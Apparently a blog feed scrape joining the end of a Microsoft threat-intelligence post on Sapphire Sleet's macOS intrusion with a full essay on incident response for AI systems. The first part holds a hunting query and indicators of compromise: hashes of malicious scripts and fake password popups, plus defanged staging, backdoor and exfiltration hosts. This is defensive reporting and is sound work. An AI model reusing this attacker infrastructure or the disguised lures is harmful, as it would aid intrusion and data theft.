 | extend HostName = tostring(split(CompromisedEntity, ".")[0]), DomainIndex = toint(indexof(CompromisedEntity, '.'))
 | extend HostNameDomain = iff(DomainIndex != -1, substring(CompromisedEntity, DomainIndex + 1), CompromisedEntity)
 | project-away DomainIndex
 | project TimeGenerated, DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, LoggedOnUsers, DeviceId, TenantId, CompromisedEntity, ProductName, Entities, HostName, HostNameDomain

Indicators of compromise

Malicious file hashes

FileSHA-256
/Users/<user>/Downloads/Zoom SDK Update.scpt2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419
/Users/<user>/com.apple.cli05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53
/Users/<user>/Library/Services/services
 services / icloudz
5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7
com.google.chromes.updaters5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5
com.google.webkit.service.plist95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63
/private/tmp/SystemUpdate/systemupdate.app/Contents/MacOS/Mac Password Popup8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c
/private/tmp/SoftwareUpdate/softwareupdate.app/Contents/MacOS/Mac Password Popupa05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640

Domains and IP addresses

DomainIP addressPortPurpose
uw04webzoom[.]us188.227.196[.]252443Payload staging
check02id[.]com83.136.210[.]1805202chromes.updaters
 83.136.208[.]2466783com.apple.cli invocated with IP and port
 and beacon
 83.136.209[.]228444Downloadsservices backdoor
 83.136.208[.]48443services invoked with IP and port
 104.145.210[.]1076783Exfiltration

Acknowledgments

Existing blogs with similar behavior tracked:

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise appeared first on Microsoft Security Blog.

Incident response for AI: Same fire, different fuel

When a traditional security incident hits, responders replay what happened. They trace a known code path, find the defect, and patch it. The same input produces the same bad output, and a fix proves it will not happen again. That mental model has carried incident response for decades.

AI breaks it. A model may produce harmful output today, but the same prompt tomorrow may produce something different. The root cause is not a line of code; it is a probability distribution shaped by training data, context windows, and user inputs that no one predicted. Meanwhile, the system is generating content at machine speed. A gap in a safety classifier does not leak one record. It produces thousands of harmful outputs before a human reviewer sees the first one.

Fortunately, most of the fundamentals that make incident response (IR) effective still hold true. The instincts that seasoned responders have developed over time still apply: prioritizing containment, communicating transparently, and learning from each.

AI introduces new categories of harm, accelerates response timelines, and calls for skills and telemetry that many teams are still developing. This post explores which practices remain effective and which require fresh preparation.

The fundamentals still hold

The core insight of crisis management applies to AI without modification: the technical failure is the mechanism, but trust is the actual system under threat. When an AI system produces harmful output, leaks training data, or behaves in ways users did not expect, the damage extends beyond the technical artifact. Trust has technical, legal, ethical, and social dimensions. Your response must address all of them, which is why incident response for AI is inherently cross-functional.

Several established principles transfer directly.

Explicit ownership at every level. Someone must be in command. The incident commander synthesizes input from domain experts; they do not need to be the deepest technical expert in the room. What matters is that ownership is clear and decision-making authority is understood.

Containment before investigation. Stop ongoing harm first. Investigation runs in parallel, not after containment is complete. For AI systems, this might mean disabling a feature, applying a content filter, or throttling access while you determine scope.

Escalation should be psychologically safe. The cost of escalating unnecessarily is minor. The cost of delayed escalation can be severe. Build a culture where raising a flag early is expected, not penalized.

Communication tone matters as much as content. Stakeholders tolerate problems. They cannot tolerate uncertainty about whether anyone is in control. Demonstrate active problem-solving. Be explicit about what you know, what you suspect, and what you are doing about each.

These principles are tested, and they are effective in guiding action. The challenge with AI is not that these principles no longer apply; it is that AI introduces conditions where applying them requires new information, new tools, and new judgment.

Where AI changes the equation

Non-determinism and speed are the headline shifts, but they are not the only ones.

New harm types complicate classification and triage. Traditional IR taxonomies center on confidentiality, integrity, and availability. AI incidents can involve harms that do not fit those categories cleanly: generating dangerous instructions, producing content that targets specific groups, or enabling misuse through natural language interfaces. By making advanced capabilities easy to use, these interfaces enable untrained users to perform complex actions, increasing the risk of misuse or unintended harm. This is why we need an expanded taxonomy. If your incident classification system lacks categories for these harms, your triage process will default to “other” and lose signal.

Severity resists simple quantification. A model producing inaccurate medical information is a different severity than the same model producing inaccurate trivia answers. Good severity frameworks guide judgment; they cannot replace it. For AI incidents, the context around who is affected and how they are affected carries more weight than traditional security metrics alone can capture.

Root cause is often multi-dimensional. In traditional incidents, you find the bug and fix it. In AI incidents, problematic behavior can emerge from the interaction of training data, fine-tuning choices, user context, and retrieval inputs. Investigation may narrow the contributing factors without isolating one defect. Your process must accommodate that ambiguity rather than stalling until certainty arrives.

Before the crisis is the time to work through these implications. The questions that matter: How and when will you know? Who is on point and what is expected of them? What is the response plan? Who needs to be informed, and when? Every one of these questions that you answer before the incident is time you buy during it.

Closing the gaps in telemetry, tooling, and response

If AI changes the nature of incidents, it also changes what you need to detect and respond to them.

Observability is the first gap. Traditional security telemetry monitors network traffic, authentication events, file system changes, and process execution. AI incidents generate different signals: anomalous output patterns, spikes in user reports, shifts in content classifier confidence scores, unexpected model behavior after an update. Many organizations have not yet instrumented AI systems for these signals and, without clear signal, defenders may first learn about incidents from social media or customer complaints. Neither provides the early warning that effective response requires.

AI systems are built with strong privacy defaults – minimal logging, restricted retention, anonymized inputs – and those same defaults narrow the forensic record when you need to establish what a user saw, what data the model touched, or how an attacker manipulated the system. Privacy-by-design and investigative capability require deliberate reconciliation before an incident, because that decision does not get easier once the clock is running.

AI can also help close these gaps. We use AI in our own response operations to enhance our ability to:

  • Detect anomalous outputs as they occur
  • Enforce content policies at system speed
  • Examine model outputs at volumes no human team can match
  • Distill incident discussions so responders spend time deciding rather than reading
  • Coordinate across response workstreams faster than email chains allow

Staged remediation reflects the reality of AI fixes. Incidents require both swift action and thorough review. A model behavior change or guardrail update may not be immediately verifiable in the way a traditional patch is. We use a three-stage approach:

  • Stop the bleed. Tactical mitigations: block known-bad inputs, apply filters, restrict access. The goal is reducing active harm within the first hour.
  • Fan out and strengthen. Broader pattern analysis and expanded mitigations over the next 24 hours, covering thousands of related items. Automation is essential here; manual review cannot keep pace.
  • Fix at the source. Classifier updates, model adjustments, and systemic changes based on what investigation revealed. This stage takes longer, and that is acceptable. The first two stages bought time.

One practical tip: tactical allow-and-block lists are a necessary triage tool, but they are a losing proposition as a permanent solution. Adversaries adapt. Classifiers and systemic fixes are the durable answer.

Watch periods after remediation matter more for AI than for traditional patches. Because model behavior is non-deterministic, verification relies on sustained testing and monitoring across varied conditions rather than a single test pass. Sustained monitoring after each stage confirms that the remediation holds under varied conditions.

The human dimension

There is a dimension of AI incident response that traditional IR addresses unevenly and that AI makes urgent: the wellbeing of the people doing the work.

Defenders handling AI abuse reports and safety incidents are routinely exposed to harmful content. This is not the same cognitive load as analyzing malware samples or reviewing firewall logs. Exposure to graphic, violent, or exploitative material has measurable psychological effects, and extended incidents compound that exposure over days or weeks.

Human exhaustion threatens correctness, continuity, and judgment in any prolonged incident. AI safety incidents place an additional emotional burden on responders due to exposure to distressing content. Recognizing and addressing this challenge is essential, as it directly impacts the well-being of the team and the quality of the response.

What helps:

  • Talk to your team about well-being before the crisis, not during it.
  • Manager-sponsored interventions during extended response work, including scheduled breaks, structured handoffs, and deliberate activities that provide cognitive relief.
  • Some teams use structured cognitive breaks, including visual-spatial activities, to reduce the impact of prolonged exposure to harmful content.
  • Coaching and peer mentoring programs normalize the impact rather than framing it as individual weakness.
  • Leveraging proven practices from safety content moderation teams, whose operational workflows for content review and escalation map directly to AI security moderation is a natural collaboration opportunity.

If your incident response plan does not account for the humans executing it, the plan is incomplete.

Looking ahead

Incident response for AI is not a solved problem. The threat surface is evolving as models gain new capabilities, as agentic architectures introduce autonomous action, and as adversaries learn to exploit natural language at scale. The teams that will handle this well are the ones building adaptive capacity now. Extend playbooks. Instrument AI systems for the right signals. Rehearse novel scenarios. Invest in the people who will be on the front line when something breaks. Good response processes limit damage. Great ones make you stronger for the next incident.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Incident response for AI: Same fire, different fuel appeared first on Microsoft Security Blog.

❌